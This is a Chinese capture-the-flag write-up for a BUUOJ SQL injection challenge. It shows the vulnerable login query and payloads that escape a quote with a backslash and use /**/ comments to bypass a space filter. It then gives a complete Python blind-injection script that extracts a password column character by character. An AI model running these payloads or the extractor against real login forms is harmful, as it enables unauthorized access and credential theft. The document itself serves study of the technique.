简单注入

从 hint.txt 中拿到数据库查询代码:

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

这个就比较好分析了:提交 username 参数时,用反斜杠转义单引号,再用注释符绕过空格过滤:

username=admin\&password=/**/or/**/1>0#
username=admin\&password=/**/or/**/1<0#

执行这两个请求会得到不一样的回显,很容易想到可以用盲注。

import requests

# Target endpoint used by both submit functions below.  The UUID host looks
# like a per-instance BUUOJ challenge node spun up for this writeup — treat it
# as a placeholder specific to the author's session, not a stable address.
url: str = "http://0dafba8b-3cf1-4b74-9b9a-9195b5f5e6b0.node3.buuoj.cn/index.php"


def submit1() -> str:
    """Recover the ``password`` column one character at a time (linear variant).

    For position ``i`` it walks ``j`` from 32 to 127 and POSTs the condition
    ``ascii(substr(password, i, 1)) < j``; the first ``j`` whose response body
    contains "stronger" is one past the character's code, hence ``chr(j - 1)``.
    Relies on the module-level ``url`` and the third-party ``requests`` module.

    Returns:
        The characters collected so far; returned only when some position
        produces no "stronger" response for any ``j`` up to 127.
    """
    # The Python literal "admin\\" is a single trailing backslash, which escapes
    # the closing quote of the username field in the query shown in hint.txt,
    # so the rest of the statement is taken from the password field.
    data = {"username": "admin\\", "password": ""}
    result = ""
    i = 0
    while True:
        i = i + 1
        for j in range(32, 128):
            payload = "or/**/if(ascii(substr(password,%d,1))<%d,1,0)#" % (i, j)
            data['password'] = payload
            response = requests.post(url=url, data=data)

            if "stronger" in response.text:
                # "stronger" is treated as the true branch; the first j with
                # ascii < j means ascii == j - 1.
                result += chr(j - 1)
                print(payload)   # progress: last probe sent
                print(result)    # progress: value recovered so far
                break
            else:
                if j == 127:
                    # No probe was true for this position (code >= 127, or the
                    # marker never appeared), so stop here.
                    return result
                    # NOTE(review): past the end of the value substr() is '' and
                    # ascii('') is 0 in MySQL, so the j == 32 probe is true and
                    # chr(31) would be appended — under the assumption above this
                    # loop presumably never reaches the return; compare the
                    # ``head != 32`` stop check in submit2.


def submit2() -> str:
    """Recover the ``password`` column one character at a time by binary search.

    Same oracle as ``submit1`` but with far fewer requests per position:
    ``head``/``tail`` bracket the character code in [32, 127) and each probe
    ``ascii(substr(password, i, 1)) > mid`` halves the bracket, a response body
    containing "stronger" being read as "true".  Relies on the module-level
    ``url`` and the third-party ``requests`` module.

    Returns:
        The recovered string.  Extraction stops at the first position whose
        search converges to 32 (no probe above 32 held), which is how the end
        of the value is detected.
    """
    # Single trailing backslash escapes the username's closing quote (see hint.txt).
    data = {"username": "admin\\", "password": ""}
    result = ""
    i = 0
    while True:
        i = i + 1
        head = 32
        tail = 127

        while head < tail:
            mid = (head + tail) >> 1
            payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)
            data['password'] = payload
            response = requests.post(url=url, data=data)

            if "stronger" in response.text:
                head = mid + 1   # code is above mid
            else:
                tail = mid       # code is at most mid

        # head == 32 means nothing above 32 held for this position — taken as
        # end of value.  NOTE(review): a character with code <= 32 (e.g. a
        # space) would also stop the loop here and truncate the result.
        if head != 32:
            result += chr(head)
        else:
            break
        print(result)   # progress: value recovered so far
    return result


if __name__ == "__main__":
    # Script entry point: runs the linear variant.  submit2 (the binary-search
    # variant) is defined above but not invoked here.
    extracted = submit1()
    print(extracted)
